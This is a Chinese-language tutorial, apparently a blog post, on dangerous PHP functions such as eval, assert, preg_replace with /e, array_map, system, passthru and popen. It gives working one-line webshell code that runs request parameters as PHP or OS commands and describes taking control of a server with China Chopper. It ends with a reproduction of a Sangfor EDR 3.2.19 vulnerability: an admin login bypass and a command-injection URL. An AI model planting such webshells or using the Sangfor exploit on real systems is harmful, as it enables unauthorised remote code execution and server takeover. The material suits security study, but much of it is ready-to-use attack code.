危险函数
eval 语句:
eval
会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如:
data:image/s3,"s3://crabby-images/f0e9c/f0e9c7f191ccfa921aa735adaad27b10ce809ec1" alt=""
?但这里我们用Feng来进行中国菜刀连接。
data:image/s3,"s3://crabby-images/ebab2/ebab2b91c0f760992f6e094e4b4529e7f19df924" alt=""
连接成功之后如下
能直接对对方服务器进行任何控制,
data:image/s3,"s3://crabby-images/31909/319092f192bebf51f6023899d94f68056284b850" alt=""
assert()
assert()同样会将字符串当做PHP 代码来执行。
data:image/s3,"s3://crabby-images/d8e0b/d8e0b3ab0a8f24092f74573f8cdaa6c82ca3beec" alt=""
在网页中通过hackbar来操作,是可以执行系统命令,如下图
data:image/s3,"s3://crabby-images/ea955/ea9557e88271bfb7f99e0365adbe45e66ea5536b" alt=""
data:image/s3,"s3://crabby-images/6a419/6a419518fe8593a9bf84e1ac78c262d4a7595358" alt=""
?preg_replace()
这个函数的作用是对字符串进行正则匹配后替换,列如下图:
data:image/s3,"s3://crabby-images/0d0db/0d0dbb54bdbea476d0438795c3b4d85ff5e3e575" alt=""
?preg_replace('$c$','C','aabbccdd')中,$c$是对最后字符串中的c进行查找,而'C'则是在查找的基础上将找到的小写c替换成大写C。
data:image/s3,"s3://crabby-images/58aac/58aacf116e9b0637ff872df45a3da845372201ca" alt=""
?这个函数在当$pattern$
处,存在e
修饰符时,$reqlacement
的值会被当成PHP代码来执行。列如下:
?在上述命令中,\\是一个转义字符,.*则就是当前(也就是括号里)。运行结果如下:
data:image/s3,"s3://crabby-images/3ad58/3ad583c77896fe1129335600e5d6498bfca995f5" alt=""
让我们换条命令:
data:image/s3,"s3://crabby-images/43c24/43c2412004d3a3e2be6fb9a8b3201db925af0511" alt=""
?
<meta charset = "utf-8">
<?php
//$qwe = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];
//assert($qwe);
//$str = preg_replace('$c$','C','aabbccdd');
$str = preg_replace('=\[(.*)\]=e','$1','[system(ipconfig)]');
echo "替换后结果为:{$str}";
?>
call_user_func()
回调函数 ,一个函数调用另外一个函数。
call_user_func('system','ipconfig');
?第一个参数是被调用函数的函数名,第二个参数是被调用的函数参数。结果如下图:
data:image/s3,"s3://crabby-images/c31c5/c31c5e557740e6b6821f79a533aa56d29faf8755" alt=""
array_map()
同样也是一个回调函数。
data:image/s3,"s3://crabby-images/7c3a4/7c3a4d32cb4337abb4e232b48b0ddafc51d81b3c" alt=""
?这里构造函数,通过array_map来调用,在调用的时候array_map会报错
data:image/s3,"s3://crabby-images/b7946/b7946e99525c52a31fe72b907c87eb40d03fab93" alt=""
?表示第二给参数应该是个数组,所有需要在第二个函数后加[],来表示。通过hackbar来修改。
data:image/s3,"s3://crabby-images/f2500/f250045da9dd79f388eb3df4b009633ce015f43e" alt=""
$code = empty($_REQUEST['code'])?'assert':$_REQUEST['code'];
$para[] = empty($_REQUEST['para'])?'phpinfo()':$_REQUEST['para'];
array_map($code,$para);
动态函数
data:image/s3,"s3://crabby-images/bb49b/bb49bb48027ab5f41eb2c5c93e326e9cbf5e62d7" alt=""
data:image/s3,"s3://crabby-images/2d329/2d329587f47a1425b98e76a07bb142fdd70ad3e0" alt=""
OS 命令执行函数
system()
能够将字符串作为OS 命令执行
data:image/s3,"s3://crabby-images/1620d/1620d4af305581e17177ca17faf08a1de812b7ae" alt=""
data:image/s3,"s3://crabby-images/0cd7c/0cd7c37fd4a52f608a93fd59fbe84a8ee8d0b42a" alt=""
$cmd = empty($_REQUEST['cmd'])?'ipconfig':$_REQUEST['cmd'];
system($cmd);
exec()
函数能将字符串作为OS 命令执行。
data:image/s3,"s3://crabby-images/1d4d4/1d4d4dbda6098b380695ec8fee58e2b2bb5c2d9d" alt=""
data:image/s3,"s3://crabby-images/6dc06/6dc06aa0ab31aa26b7ca6c95d1aa042a20cc9f67" alt=""
?但传参为ipconfig
data:image/s3,"s3://crabby-images/e1c61/e1c61b80850f26033424d6ab55de0a21b364c2dc" alt=""
就只显示最后一行了,
shell_exec()
data:image/s3,"s3://crabby-images/e2c72/e2c728c7e43e712238b8b84ece8ccbd210f3e45e" alt=""
data:image/s3,"s3://crabby-images/7c984/7c984d10192a19a4013e5d41330bf5a138f6926c" alt=""
?相比于shell_exec比exec显示更加全面。
passthru()
将字符串当做系统命令执行。自带输出功能.
data:image/s3,"s3://crabby-images/0db7f/0db7fc506ce5fb1ec9913008ffc202bf43f91e2f" alt=""
data:image/s3,"s3://crabby-images/3fd2b/3fd2bd3c6729823461de53e5218450840bfb51a8" alt=""
$cmd = empty($_REQUEST['cmd'])?'ipconfig':$_REQUEST['cmd'];
passthru($cmd);
?popen()
data:image/s3,"s3://crabby-images/6927e/6927e384ddf6f64475286c366dbd1a001fc391b1" alt=""
data:image/s3,"s3://crabby-images/47b33/47b3366fcaff0979b46db9fe1479a03b81cfd1b9" alt=""
$cmd = empty($_REQUEST['cmd'])?'whoami':$_REQUEST['cmd'];
$f = popen($cmd, 'r');
echo fread($f, 4096);
?popen的返回结果为打开文件的字节流,相当打开一个文件,当信息放进去。
?
反引号
反引号` 内的字符串,会被解析成OS 命令。
data:image/s3,"s3://crabby-images/a1f1d/a1f1d12076dca7e01f32b3e3069ee53bf19b8a7b" alt=""
data:image/s3,"s3://crabby-images/ac54c/ac54c20beecd1b8a18b0c3aed1ae06762cfc08bd" alt=""
sangfor_edr_3.2.19_rce漏洞浮现
越权
在url后追加user=admin,即可实现任意用户登录。
data:image/s3,"s3://crabby-images/04708/047083a058f58aa77b6a6ddb4e32db10ba7ea785" alt=""
?
在url? http://*.*.*.*后追加/tool/log/c.php
data:image/s3,"s3://crabby-images/1f6ee/1f6eebab3424b2e1316023ec5d026952f1ea39b4" alt=""
?在上面url基础上追加?strip_slashes=system&host=whoamidata:image/s3,"s3://crabby-images/553a2/553a279886c5815c6b5115acdc3ebfa2e603a41f" alt=""
?漏洞复现。
?